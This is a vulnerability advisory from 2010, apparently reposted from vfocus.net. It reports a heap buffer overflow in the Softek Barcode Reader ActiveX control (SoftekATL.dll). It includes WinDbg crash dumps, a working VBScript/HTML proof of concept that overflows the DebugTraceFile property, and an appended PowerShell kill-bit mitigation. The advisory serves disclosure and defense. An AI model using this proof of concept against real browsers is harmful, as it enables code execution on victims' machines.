Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC
Source: vfocus.net   Author: LiquidWorm   Published: 2010-09-23

Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC


Vendor: Softek Software Ltd
Product web page: http://www.bardecode.com
Affected version: 7.1.4.14

Summary: The Softek Barcode Reader Toolkit for Windows is an SDK that enables applications
to extract barcode information from images. The APIs available in the toolkit include .NET,
Java, COM, OCX and a Windows DLL. The standard version includes support for both 1-D and 2-D
barcodes, and special features include the ability to split documents by barcode position.

Desc: The vulnerability is caused by a boundary error in SoftekATL.DLL when handling the
value assigned to the "DebugTraceFile" property. It can be exploited to cause a heap-based
buffer overflow via an overly long string, which may lead to execution of arbitrary code.


--------------------------------------------------------------------------

(824.ce0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=44444444 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4444443c
eip=7c96fa89 esp=0013f0a0 ebp=0013f100 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707          movzx   eax,word ptr [edi]       ds:0023:4444443c=????
0:000> g
(824.ce0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=42424242 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4242423a
eip=7c96fa89 esp=0013f0ac ebp=0013f10c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707          movzx   eax,word ptr [edi]       ds:0023:4242423a=????
0:000> g
eax=00000000 ebx=00000000 ecx=7c800000 edx=7c97e120 esi=7c90de6e edi=00000000
eip=7c90e514 esp=0013fe5c ebp=0013ff58 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
7c90e514 c3              ret

-----------------------

EIP 7C96FA89
EAX 00000001
EBX 42424242
ECX 7FFDD000 -> 0013F0FC
EDX 00470608 -> 00152CA0
EDI 42424239
ESI 00470000 -> 000000C8
EBP 0013F10C -> 0013F1F4
ESP 0013F0AC -> 00470000

--------------------------------------------------------------------------


Tested on: Microsoft Windows XP Professional SP3 (English)
           Microsoft Windows Internet Explorer 8.0.6001.18702
           Softek Barcode Reader 7.3.1


Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk

21.09.2010


Advisory ID: ZSL-2010-4965
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4965.php


Proof of Concept:
-----------------

<object classid='clsid:11E7DA45-B56D-4078-89F6-D3D651EC4CD6' id='bardecode' />
<script language='vbscript'>

targetFile = "C:\Program Files\Softek Software\Softek Barcode Toolkit\bin\SoftekATL.dll"
prototype  = "Property Let DebugTraceFile As String"
memberName = "DebugTraceFile"
progid     = "SoftekATL.CBarcode"
argCount   = 1

buffof = String(262, "A") + "BBBB" + String(4408, "C") + "DDDD"

bardecode.DebugTraceFile = buffof

</script>
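Added here as a defender-side example, not part of the original advisory: a PowerShell snippet that sets the Internet Explorer kill bit for the control's CLSID (taken from the PoC above) so that IE and the WebBrowser control refuse to instantiate SoftekATL.CBarcode from a web page, then verifies the setting. It assumes an elevated prompt; the registry paths are the standard ActiveX Compatibility keys and the 0x400 value is the documented kill-bit flag.

```powershell
# Added example, not part of the original advisory. Assumes an elevated prompt.
$Clsid   = '{11E7DA45-B56D-4078-89F6-D3D651EC4CD6}'   # CLSID from the PoC above
$KillBit = 0x400                                      # documented IE kill-bit flag

function Get-CompatKeys {
    # Native registry view, plus the 32-bit view when running on 64-bit Windows.
    $base  = 'SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'
    $paths = @("HKLM:\$base\$Clsid")
    if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
        $paths += "HKLM:\SOFTWARE\Wow6432Node\$base\$Clsid"
    }
    return $paths
}

function Set-KillBit {
    foreach ($key in Get-CompatKeys) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # OR the kill bit into any flags already present instead of overwriting them.
        $existing = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                     -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $existing) { $existing = 0 }
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' `
                         -Value ($existing -bor $KillBit) -Type DWord
    }
}

function Test-KillBit {
    # Returns $true only when every applicable registry view carries the kill bit.
    $ok = $true
    foreach ($key in Get-CompatKeys) {
        $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                  -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $flags -or ($flags -band $KillBit) -ne $KillBit) {
            Write-Warning "Kill bit not set: $key"
            $ok = $false
        }
    }
    return $ok
}

Set-KillBit
if (Test-KillBit) { Write-Host "Kill bit set for $Clsid; IE will no longer load the control." }
```

Test-KillBit on its own is also a quick audit check for machines that have the toolkit installed but have not yet been remediated.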

